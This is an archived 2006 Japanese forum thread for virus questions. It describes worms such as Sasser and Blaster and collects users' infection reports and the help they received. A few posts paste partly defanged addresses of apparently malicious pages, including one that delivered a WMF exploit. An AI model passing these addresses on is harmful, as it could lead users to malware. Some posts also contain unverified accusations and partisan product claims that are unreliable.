5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ウィルス情報質問 総合スレッド★Part35

1 :名無しさん@お腹いっぱい。:2006/02/28(火) 21:49:07
ウィルスに関わる話題・質問はこちら。
Winny関連のウィルスは、Download板に専門スレッドがあります。

【  最  重  要  事  項  】
ウィスルやブラクラだと思われる物の直リンは厳禁!!!!!!!!!!
質問の時は頭の『ht』を抜いて貼り付ける事

【質問する前、書き込む前に必読する】 テンプレサイト
コンピュータウィルス総合スレッド テンプレミラーサイト(PC初心者板)
http://pcqa.tripod.co.jp/virus.htm
【警報】Winnyを狙ったワーム・ウイルス情報 テンプレまとめサイト(Download板)
http://www.geocities.jp/kemkzuenc/Antinny.html

尚、質問・回答が効率的に行えるよう、質問時には次のテンプレを使用してください。

【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】


2 :名無しさん@お腹いっぱい。:2006/02/28(火) 21:50:33
■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。

最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。

■■ワクチンメーカーリンク集■■  ※ウィルス監視ソフトをワクチンソフトとも呼びます。

・トレンドマイクロ株式会社 http://www.trendmicro.com/jp/home/personal.htm
 製品名:ウイルスバスター2005インターネットセキュリティ他
・株式会社シマンテック http://www.symantec.com/region/jp/
 製品名:NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)
http://www.vintage-solutions.com/Japanese/
 製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン http://www.aladdin.co.jp
 製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 http://www.caj.co.jp/
 製品名:InocuLAN、CheyenneAntiVirus
・マカフィー株式会社 http://www.mcafee.com/jp/default.asp
 製品名:McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
 http://www.nai.com/japan/download/dat3end.asp (リンク切れ)
 該当する場合は諦めてノートンかウィルスバスターを買いましょう。

3 :名無しさん@お腹いっぱい。:2006/02/28(火) 21:51:15
■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
 →常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
 →知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
 →ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
 →アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
 →怪しいファイルにウィルスが混入しているケースもよくあることです。
  怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
 もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
 http://www.ipa.go.jp/security/outline/todokede-j.html
 こちらに届け出の方法などが記載されています。
 E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。

4 :名無しさん@お腹いっぱい。:2006/02/28(火) 21:51:53
W32.Sasser.Wormとその亜種にご注意!!
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D


5 :名無しさん@お腹いっぱい。:2006/02/28(火) 21:52:24
Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。

Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html


6 :名無しさん@お腹いっぱい。:2006/02/28(火) 21:52:55
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
  * Mail Delivery System (<受取人メールアドレス>)
  * Failure (<受取人メールアドレス>)
  * Delivered Message (<受取人メールアドレス>)
  * Deliver Mail (<受取人メールアドレス>)
  * Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
   例: date7386.pif 、 message19392.zip など

「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
  * Error
  * Status
  * Server Report
  * Mail Transaction Failed
  * Mail Delivery System
  * hello
  * hi
  [ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
  "test"
  "The message contains Unicode characters and has been sent as a binary attachment."
  "The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
  "Mail transaction failed. Partial message is available."
  [ 任意の文字列 ]  [ 空白 ]
・添付ファイル名: ランダムなアルファベット

7 :名無しさん@お腹いっぱい。:2006/02/28(火) 21:53:39
「がいしゅつです」Q&A
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
   ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8

Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
http://www.mcafeesecurity.com/japan/security/vlibrary.asp

Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
  デスクトップの背景が蓮画像になってしまいます 。
A3.Winny関連ウィルスですので、Download板へどうぞ。
  ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ニュイルス情報 Part36
http://tmp4.2ch.net/test/read.cgi/download/1111385299/

Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト Part5
http://pc5.2ch.net/test/read.cgi/sec/1107065884/

Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
エロサイト見たら…助けて下さい!Part52
http://pc5.2ch.net/test/read.cgi/pcqa/1111405528/


8 :名無しさん@お腹いっぱい。:2006/02/28(火) 21:55:33
関連スレッド

Winnyを狙ったワーム・ニュイルス情報 Part42
http://tmp5.2ch.net/test/read.cgi/download/1123171787/
sasser【スタコラサッサ】sasser Part2
http://pc5.2ch.net/test/read.cgi/sec/1083839516/
Blasterスレ part5
http://pc8.2ch.net/test/read.cgi/sec/1065964513/
【差出人】WORM_NETSKY【詐称】
http://pc5.2ch.net/test/read.cgi/sec/1080741342/
「Nimda !! 」【その4】
http://pc5.2ch.net/test/read.cgi/sec/1001864573/
エロサイトを見たら…助けてください!Part57
http://pc8.2ch.net/test/read.cgi/pcqa/1122562575/
【緊急!】ウィルス即行駆除方法【助けて!】
http://pc8.2ch.net/test/read.cgi/sec/1091174837/
アンチウィルスソフトのウィルス誤検出
http://pc8.2ch.net/test/read.cgi/sec/1027753135/
毎日ウィルスメールが送られてくるのですが・・2通目
http://pc8.2ch.net/test/read.cgi/sec/1086494732/

関連スレは次スレに移行してる場合もあります。


質問する前に検索しましょう
http://www.yahoo.co.jp/
http://www.google.co.jp/

テンプレここまで。
古いところもありますが、適宜ヨロシクということで、マターリいきまっしょ。

9 :名無しさん@お腹いっぱい。:2006/02/28(火) 22:32:41
セキュリティ板に常駐している荒らし屋(NOD32厨と淫厨を兼ねている)が、
必死に工作活動を行っているのでご注意。競合製品のサポートサイトから過去のトラブルを探して、
自分のPC上で起こっていないトラブル相談をユーザーを装って大量にネットに投稿したりしています。
ちなみにアマゾンレビューや価格コム掲示板などでも、同様の工作をしていますのでご注意。

http://tmp6.2ch.net/test/read.cgi/tubo/1130566010/
http://66.102.7.104/search?q=cache:yFC7aJM6xCgJ:l-lab.org/pukiwiki/pukiwiki.php
http://z-temp.hp.infoseek.co.jp/2ch/Prescott699-.html
http://science3.2ch.net/test/read.cgi/infosys/1088029040/
http://mossarilog.at.infoseek.co.jp/
現時点で確認されているリモホ
osaknt01.ap.so-net.ne.jp
osaka-ip.dti.ne.jp


10 :名無しさん@お腹いっぱい。:2006/02/28(火) 22:33:46
スレ立て乙

11 :名無しさん@お腹いっぱい。:2006/02/28(火) 22:35:08
>>1


12 :名無しさん@お腹いっぱい。:2006/02/28(火) 22:36:32
>>1

13 :名無しさん@お腹いっぱい。:2006/02/28(火) 22:43:13
アンチウイルスの性能評価をしている「AV Comparitives」の最新の総合性能テスト結果。(次回は3月発表)
http://www.av-comparatives.org/seiten/ergebnisse/report07.pdf
http://www.av-comparatives.org/
1位 Kaspersky
2位 Symantec(ノートン)

スパイウェアに対する検出力評価
ttp://www.infoworld.com/article/05/09/19/38FEspy_1.html
1位 F-Secure
2位 Webroot
3位 LANDesk
4位 Sunbelt
5位 SurfControl
6位 McAfee
7位 Trend Micro
8位 eTrust
9位 NOD32 v2.5

P2P系ウイルスに対応が早い傾向なのはウイルスバスターやSymantec(ノートン)。
http://www.viruslist.com/en/find?search_mode=virus&words=Antinny&x=14&y=7
http://www.viruslist.com/en/find?search_mode=virus&words=Mellpon&x=0&y=0

14 :名無しさん@お腹いっぱい。:2006/02/28(火) 22:46:06
>>1
スレ立て乙

15 :名無しさん@お腹いっぱい。:2006/02/28(火) 22:59:36

前スレ


ウィルス情報&質問 総合スレッド☆Part34
http://pc8.2ch.net/test/read.cgi/sec/1135274553/

16 :名無しさん@お腹いっぱい。:2006/03/01(水) 01:37:48
【使用OS】 WindowsXP Pro SP2
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 Norton Internet Security 2006
【ちゃんとUpdateしてるか】 してます
【スキャンした結果(ウイルス名・発見場所)】 Adware.SpySheriff

【症状を具体的に、分かる限りすべて書く】
タスクに赤丸に×印のついたものが表示され
ポップアップで、Spywareインストールに誘導します
Nortonのファイアウォールにてその時通信しようとする
Exeの通信を全て遮断しているので
それ以上の被害はなさそうです。
そのExeファイルは2022、1344などランダムな数字がファイル名になっています。

【何をしたらそんなことになったのか】
原因不明です。
ある日突然発祥しました。
PC自体は新調したところで怪しいサイトものぞいたことがありません。

【これまでにとった措置】
Nortonにてスキャン後、削除し、
レジストリ値も該当項目が削除されていること確認してますが、
数日たつとまた復活してきます。

【その他の質問】
Nortonだけですと完全に削除が出来ていないようなので、
完全に消し去る方法をお教えいただければありがたいです

17 :名無しさん@お腹いっぱい。:2006/03/01(水) 01:40:30
質問なんですが、エクセルのデータを「ぬるぽ」に改ざんするウイルスはnyで出回っていますか?
しかも2の付く日にちに主に改ざんされています。

18 :名無しさん@お腹いっぱい。:2006/03/01(水) 02:09:50
>>16
ウイルスというかスパイウェアだし
ここ見れば一通り駆除の仕方とかどっから入ってきたのか判るかと


Spysheriff スパイシェリフ被害者の会
http://pc8.2ch.net/test/read.cgi/sec/1118245363/

19 :名無しさん@お腹いっぱい。:2006/03/01(水) 11:56:44
a 1 4 9 - 1 8 8 - 1 9 9 - 2 1 9 . d e p l o y . a k a m a i t e c h n o l o g i e s . c o m
t e m p u r i . o r g

20 :名無しさん@お腹いっぱい。:2006/03/02(木) 03:52:09
【使用OS】WindowXPの家庭用
【Update】してませんでした・・・
【アンチウィルスソフト】ノートン2005
【スキャンの結果】EXPL_WMF.GEN の検出
【症状】今のところ無し


 ttp://thumbstower.com/?pics/animals/pages/2161.jpg

を踏んでしまい、インストールの画面が出ました。
感染は初めてでどうしたらいいのか…駆除方法を
ご教授ください!

21 :名無しさん@お腹いっぱい。:2006/03/02(木) 04:45:31
>>20
そりゃよかったね
何をインストールされたのかもこっちはわからないのに
あんた、バカじゃないの

22 :名無しさん@お腹いっぱい。:2006/03/02(木) 04:49:57
>>20
ウィルス名わかってるんだからググればあちこち対処法出てくるよ

23 :20:2006/03/02(木) 04:51:23
>>21
一瞬でその画面は消えちゃって・・・
青い点線(?)が横に走るみたいな画面は何かが
インストールされてるものだと思ってたんですが
間違いだったのかな


24 :名無しさん@お腹いっぱい。:2006/03/02(木) 04:58:35
【スキャンの結果】EXPL_WMF.GEN の検出
と書いてるのに間違いとはどーいうことだ

25 :名無しさん@お腹いっぱい。:2006/03/02(木) 04:59:43
>>22
検索したんですがよくわからない・・・
でもまず自力で頑張ってみます
また何か聞くと思います
なにとぞよろしくお願いします

26 :名無しさん@お腹いっぱい。:2006/03/02(木) 05:03:09
つーか検出出来てんだから隔離して消せばいいだけじゃん

27 :名無しさん@お腹いっぱい。:2006/03/02(木) 05:06:37
>>25
これはIEの脆弱性を突くウイルス
Windowsをアップデートしてれば効果なし
つってもしてないしてないなw
その場合はアップデートして一時ファイルを捨てれば問題ない

28 :名無しさん@お腹いっぱい。:2006/03/02(木) 05:09:52
レスが!ありがとうです!

オンラインスキャンでは 【駆除 できない】という
表示になっておりまして・・・
手作業(?)でやらなきゃいけないってことなのかな?
3年間感染したこと無くて、まったくの初めてから
やることになります。
いっそもう一度OSを入れ直す(これも経験無し)のが
手っ取り早かったりしてとも考え中です。


29 :名無しさん@お腹いっぱい。:2006/03/02(木) 05:12:52
>>27さん

ありがとうございます
一昨年くらいの騒ぎの時はアップデートしてたおかげで
なにも起こらずに済んだのに、怠慢になってました(反省)

一時ファイルを捨てるで検索しますね!


30 :名無しさん@お腹いっぱい。:2006/03/02(木) 05:18:48
とりあえず27の方法やれば大丈夫だから無茶するなw
もし駆除出来てないならここにある
C:\Documents and Settings\ユーザー名\Local Settings\TEMP\ランダムな文字列.wmf
てかこれほとんどのセキュリティーソフトが対応してるから大丈夫だと思うよ

31 :名無しさん@お腹いっぱい。:2006/03/02(木) 06:23:58
>>13
最新の3月分。

アンチウイルスの性能評価をしている「AV Comparitives」の最新の総合性能テスト結果。(3月分)
ttp://www.av-comparatives.org/seiten/ergebnisse_2006_02.php
※polymorphicウイルス検出結果
1位 ノートン           100%
2位 AntiVirusKit(G DATA)  99,9%
3位 Kaspersky5、F-Secure6 99,4%

4位 NOD32 v2.5         94,3%


※ウイルス検出結果(DOSウイルスは含まない)
1位 AntiVirusKit(G DATA) 99,84%
2位 F-Secure6 99,58%
3位 Kaspersky5 99,57%
4位 NOD32 v2.5 97,89%
5位 ノートン 97,61%
6位 TrustPort(WS用) 97,35%
7位 McAfee 96,41%
8位 H+B EDV 96,19%
9位 BitDefender9 Pro 93,08%
10位 AVG 90,47%
11位 Avast! 89,24%
12位 Dr. Web 88,76%
13位 Panda 85,70%
14位 NormanVirusControl 85,32%
15位 F-Prot Anti-Virus 83,91%
16位 VBA32(WS用) 76,70%


32 :名無しさん@お腹いっぱい。:2006/03/02(木) 16:02:16
>8位 H+B EDV 96,19%
これAntiVirか?BD上回るとはなー。

33 :名無しさん@お腹いっぱい。:2006/03/02(木) 16:46:37
bitdifenderとavastを併用してます。
ところで、会社の帰りにウイルスチェックをかけて、そのままウインドウズを自動終了させたいのですが、
そういったことができるウイルスソフトないしはサポートソフトはありますでしょうか?

34 :名無しさん@お腹いっぱい。:2006/03/02(木) 17:12:29
>>33
ttp://www.vector.co.jp/

35 :名無しさん@お腹いっぱい。:2006/03/02(木) 17:43:42
>>20(最後の書き込み29)です
アドバイスの通りにアップデートしました。再びオンライン
スキャンしたところ何も検出されなくなりました!
泣きそうだったのが嘘のようです。アップデートの重要性を
痛感しました・・・本当にありがとうございます!


36 :名無しさん@お腹いっぱい。:2006/03/02(木) 21:30:42
wmfは緊急アップデートがくる程、話題になった物だからね
てか、お礼のレスとは律儀な奴だなw

37 :名無しさん@お腹いっぱい。:2006/03/03(金) 09:11:44
感染したっぽい。
携帯で調べたけど、情報が見つからなかったので聞きます。

【使用OS】XP SP2
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】ウィルスセキュリティ
【ちゃんとUpdateしてるか】している
【スキャンした結果(ウイルス名・発見場所)】突然発症。
【別のオンラインスキャンしたならその結果は】してない(できない)
【症状を具体的に、分かる限りすべて書く】電源を入れてもBIOSが起動せず、意味不明な音声がスピーカーから流れる(詳細は下)。リセットボタンも使えず、BIOSも起動しないので、セーフモードも使えない。現在電源落としてそのまま放置。
【何をしたらそんなことになったのか】一度起動、グーグル先生で検索直後にフリーズし、再起動させたが、それ以来立ち上がらない。
【これまでにとった措置】お手上げ。
【その他】
スピーカーから流れる音声を携帯で録音してみました。3GPファイルなので、クイックタイム等で再生してください。
突然だったので、かなりびっくりしました。
ttp://m.pic.to/37fxg

38 :名無しさん@お腹いっぱい。:2006/03/03(金) 14:24:55
>>35
何も検出されなかったぐらいで安心するなんてめでてーやつだな。
検出されない亜種なんていくらでもいるし新種は言わずもがなだし。

39 :名無しさん@お腹いっぱい。:2006/03/03(金) 17:59:54
ttp://internet.watch.impress.co.jp/cda/news/2006/03/03/11103.html
日本でもスピア型ウイルス、「対日アンチダンピング情報」装うメール確認

40 :名無しさん@お腹いっぱい。:2006/03/03(金) 18:42:31
>>37 ほかの端末でKNOPPIXでググレ

41 :名無しさん@お腹いっぱい。:2006/03/03(金) 21:42:46
>>38
それ言ってたらキリないけどな

42 :名無しさん@お腹いっぱい。:2006/03/04(土) 03:32:48
いつもはフザけてるが、さすがセキュ板だな
山田の話なんか出てこない。

43 :名無しさん@お腹いっぱい。:2006/03/04(土) 03:34:39
どういう意味だ?

44 :名無しさん@お腹いっぱい。:2006/03/04(土) 03:38:03
山田にかかってる奴がいないって事。
感染する前に対策をちゃんとしてるから、話題にすらならない。


45 :名無しさん@お腹いっぱい。:2006/03/04(土) 03:43:01
気づいてないかダウソ逝ってんだろ
バカフィースレなんか見るとまだそんな事いってんのかと唖然とするよ


46 :名無しさん@お腹いっぱい。:2006/03/04(土) 03:55:36
>>42
そんな改造したら亜種が虫のように湧いてくる.exeに対応しても埒が明かない。
ベンダーは、OS改変をするほとんどの.exeファイルなんてのに完全対応する気なんてさらさらないからな。

47 :名無しさん@お腹いっぱい。:2006/03/04(土) 03:56:50
ダウソ板で盛り上がってる話はセキュ板に持ち込んではいけない
って強迫観念がみんなの中にあるんだよ。

48 :名無しさん@お腹いっぱい。:2006/03/04(土) 10:01:38
なんかOSが起動しなくなったんですけど、ウイルスなんでしょうか?

PCを起動したときに

Non-System diskette
Replace and press any key to reboot

ってでるんですけど…

49 :名無しさん@お腹いっぱい。:2006/03/04(土) 11:04:42
>>48
まずフロッピーなりUSBメモリなりが刺さってたらそれを抜け

50 :名無しさん@お腹いっぱい。:2006/03/04(土) 15:36:32
何でもかんでもウイルス扱い('A`)

51 :名無しさん@お腹いっぱい。:2006/03/04(土) 17:26:28
すいません、別スレに書き込んだ後にこのスレの存在に気が付きました・・・

【使用OS】 WinXP Home
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 ノートン
【ちゃんとUpdateしてるか】 最新
【スキャンした結果(ウイルス名・発見場所)】 スキャン結果は0
【別のオンラインスキャンしたならその結果は】 IEが使えず・・・
【症状を具体的に、分かる限りすべて書く】 症状は下に欠きました
【何をしたらそんなことになったのか】 デーモンツールをインストール
【これまでにとった措置】 お手上げ状態・・・
【その他の質問】

先ほどから、起動するとファイアーウォールとノートンが起動されなくなり、Windowsファイアーウォールの設定も開けなくなりました。
どうやら回線はつながってるようですが(現にホットゾヌ経由でここに書き込み)、IEだけ使えなくなりました・・・。
ファイアーウォール設定では「不明なエラーにより設定を開けません」等というメッセージが表示され、設定できません。

ノートンは起動すると応答しないようです

これって何かのウィルスでしょうか?
チェックにはひっかかりません・・・。

52 :名無しさん@お腹いっぱい。:2006/03/04(土) 20:13:47
>>51
ノートンとファイヤーウォール潰そうとするってことはまずウイルス
IEで繋げなくなったのも恐らくハイジャックかなんか

53 :名無しさん@お腹いっぱい。:2006/03/04(土) 21:05:37
そのデーモンどっから持ってきたのよ

54 :名無しさん@お腹いっぱい。:2006/03/04(土) 22:00:25
むしろ、そのデーモンをうpしろ。
俺らでウイルスかどうか判定するよ。

55 :51:2006/03/04(土) 23:44:22
tp://www5e.biglobe.ne.jp/~bto/cd/
ここのdemon317をDLしてインスコしてからおかしくなりました・・・

56 :名無しさん@お腹いっぱい。:2006/03/05(日) 00:21:42
なんかマウントしてないか〜?

57 :名無しさん@お腹いっぱい。:2006/03/05(日) 00:29:00
>>55
これは明らかにウイルスとは関係ないと思う

58 :名無しさん@お腹いっぱい。:2006/03/05(日) 00:35:32
微妙に敷居が高いけど↓に行った方がいくね?
ttp://bbs.higaitaisaku.com/cbbs.cgi

59 :名無しさん@お腹いっぱい。:2006/03/05(日) 01:07:43
System Volume Informationの中に感染してる.exeがあるようなのですが、
削除の方法が分かりません。ウイルス自体は発症してないようなので削除
の仕方を教えてください。
【使用OS】XP SP2




60 :名無しさん@お腹いっぱい。:2006/03/05(日) 01:21:33
>>59
なぜそれがわかったの?
ソフトが検出したなら隔離して削除すればよいのでは?

61 :名無しさん@お腹いっぱい。:2006/03/05(日) 01:29:57
>>60
ウイルスバスターオンラインスキャンでは↑の感染.exeが検出されるんですけど
元々入ってたセキュリティーソフトやオンライン駆除が出来るサイトじゃ検出
出来なかったんです。だから手動で駆除しようかと思いまして。

62 :名無しさん@お腹いっぱい。:2006/03/05(日) 01:34:05
フォルダオプションの表示の中に
保護されたオペレーティング システム ファイルを表示しない
というのがあるのでチェックをはずす
そうすれば見えるはずです
消す消さないは自己責任で

63 :名無しさん@お腹いっぱい。:2006/03/05(日) 09:06:47
>>62
見えるか?ユーザーにアクセス権がないのによ
アクセス権を設定しないと何も出来ない
その前にシステム保護されているから、システムの復元サービスも無効にしないとな

64 :名無しさん@お腹いっぱい。:2006/03/05(日) 19:16:15
>>62
つかそのくらいはプロパティから判断できると思ったんだが

65 :名無しさん@お腹いっぱい。:2006/03/05(日) 19:25:48
ttp://85.255.117.38/site.htm?lng=1&trg=rc
このサイト見るだけでウィルスに感染してしまうか心配です。
このサイトは安全でしょうか?

66 :名無しさん@お腹いっぱい。:2006/03/05(日) 19:27:30
スレ違いって言葉分かりますか
分かるなら帰ってください

67 :名無しさん@お腹いっぱい。:2006/03/05(日) 21:19:35
不安なので質問させてください
【使用OS】 XP の SP2
【WindowsUpdateしてるか】 一応していますが最新ではないかもしれません
【AntiVirusは何を使っているか】 マカフィーを期限切れのまま放置していました
【ちゃんとUpdateしてるか】 上記のとおりです・・・
【スキャンした結果(ウイルス名・発見場所)】 ホットゾヌのフォルダからBloodhound.Exploit.6とUnix.Penguin が
【別のオンラインスキャンしたならその結果は】 シマンテックのオンラインスキャンで上記のウィルスが計6個見つかりました
【症状を具体的に、分かる限りすべて書く】 特に不具合はありません
【何をしたらそんなことになったのか】 ウィルス対策ソフトを入れないままアダルトサイトを見てしまったのが不安で
スキャンしてみたら見つかりました・・・
【これまでにとった措置】 とりあえずごみ箱に入れたところで完全に削除してよいものかどうかわからなくなり
電気屋に行きノートン買ってインストールしてスキャンしました。
Bloodhound.Exploit.6は検疫済み、Unix.Penguin は駆除と出ました
【その他の質問】 特に不具合はないので不安なのは情報の流出のみです。
特に仕事で使っているデータがデスクトップにあったもので・・・
デスクトップを流出させるのはWINNYだけなんでしょうか?
ちなみにWINNYは以前は使用していましたが最近はめっきり使っていません。
ですがまだデスクトップにあります。

どなたか教えてください。よろしくお願いします。



68 :名無しさん@お腹いっぱい。:2006/03/05(日) 21:27:57
個々のウィルスについての詳細は検出したウィルス名でググればわかると思いますが
どういう動きをするのか、とか
個人情報の流出については今騒いでいる山田オルタなどは
P2PではなくPCに外から進入されて中身全部丸見えになります

69 :名無しさん@お腹いっぱい。:2006/03/05(日) 21:36:06
早速のご回答ありがとうございます
中味全部丸見え・・・_| ̄|○
ぐぐったのですが、自分では気づかないうちに何かをする種類のようで・・・
山田オルタ、調べてみます。

70 :名無しさん@お腹いっぱい。:2006/03/05(日) 22:31:08
>>67
【ノートン】インターネットセキュリティ Ver.83【2006】
http://pc8.2ch.net/test/read.cgi/sec/1140777438/
逝ってみれ。

71 :名無しさん@お腹いっぱい。:2006/03/05(日) 22:46:30
山田じゃないし

72 :名無しさん@お腹いっぱい。:2006/03/05(日) 23:11:48
>>70
ありがとうございます。
逝ってみます。
WINNY削除しました。うっかりつられて今までダウンロードしたデータも
すべて削除してしまいました_| ̄|○  

73 :名無しさん@お腹いっぱい。:2006/03/05(日) 23:20:05
対処方を教えて下さい。お願いします。
【使用OS】WinME
【WindowsUpdateしてるか】重要と出るのをしています。
【AntiVirusは何を使っているか】使ってませんorz
【ちゃんとUpdateしてるか】最新のはしてません;
【スキャンした結果(ウイルス名・発見場所)】トレンドマイクロ社オンラインスキャンにてTROJ_DYFUCA.Iと検出
【別のオンラインスキャンしたならその結果は】してません。
【症状を具体的に、分かる限りすべて書く】
英語の羅列でYES.NOの表示と多数のポップアップが表示される。
【何をしたらそんなことになったのか】MSNメッセンジャーからHotmailに接続しようとした時。
【これまでにとった措置】トレンドマイクロの対応方法を実行。
*システムクリーナー→無料のオンラインスキャン→検出されたファイル削除選択→現在使用中のため削除する事が出来ません
*手動削除手順→指定されたレジストリの値・レジストリキー削除→無料のオンラインスキャン→検出されたファイル削除選択→現在使用中のため削除する事が出来ません。
【その他の質問】
セキュリティ初心者スレにてのご教授にてセーフモードから処置しようとしましたがネット接続出来なかったので断念しました。
同じくハンドルがロックされてるから削除できず、プロセス切らないとダメとご教授受けたのですがセキュリティやウィルスに関する知識が無いのでプロセスがどのようなものか解りません。

74 :名無しさん@お腹いっぱい。:2006/03/05(日) 23:47:01
>>73
感染しても対処出来る自信はどうした?
ノータリンか?ボケッ

75 :名無しさん@お腹いっぱい。:2006/03/05(日) 23:51:41
>>73
クリーンインストール

76 :名無しさん@お腹いっぱい。:2006/03/06(月) 00:19:37
>>73
セーフモードで手動で

77 :名無しさん@お腹いっぱい。:2006/03/06(月) 00:44:17
>>73
TROJ_DYFUCA.I
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DYFUCA.I
駆除ソフト買ってきたほうが早い

78 :名無しさん@お腹いっぱい。:2006/03/06(月) 19:26:34

初心者の方々へ

いずれにしろ、トラブルが多く不確実なアンチウイルス製品などに頼り切るよりも、
怪しげなファイルは実行しないという【基本】を重視しようね。


>NOD32 主なトラブル履歴
>
>2005年9月ブルースクリーンが生じてWindowsが停止する問題が再発。リリース中止。
>http://canon-sol.jp/product/nd/nd_update.html
>レジストリが破壊されてWindowsシャットダウン時にブルースクリーンとなる問題
>登録済みのアプリケーションが強制削除される問題
>http://canon-sol.jp/product/nd/v20008.html
>通信不能となって最悪の場合はOSがリブートの繰り返しになる問題
>http://canon-sol.jp/supp/nd/wndt4210.html
>スキャンすると受信メールの全部が削除される問題
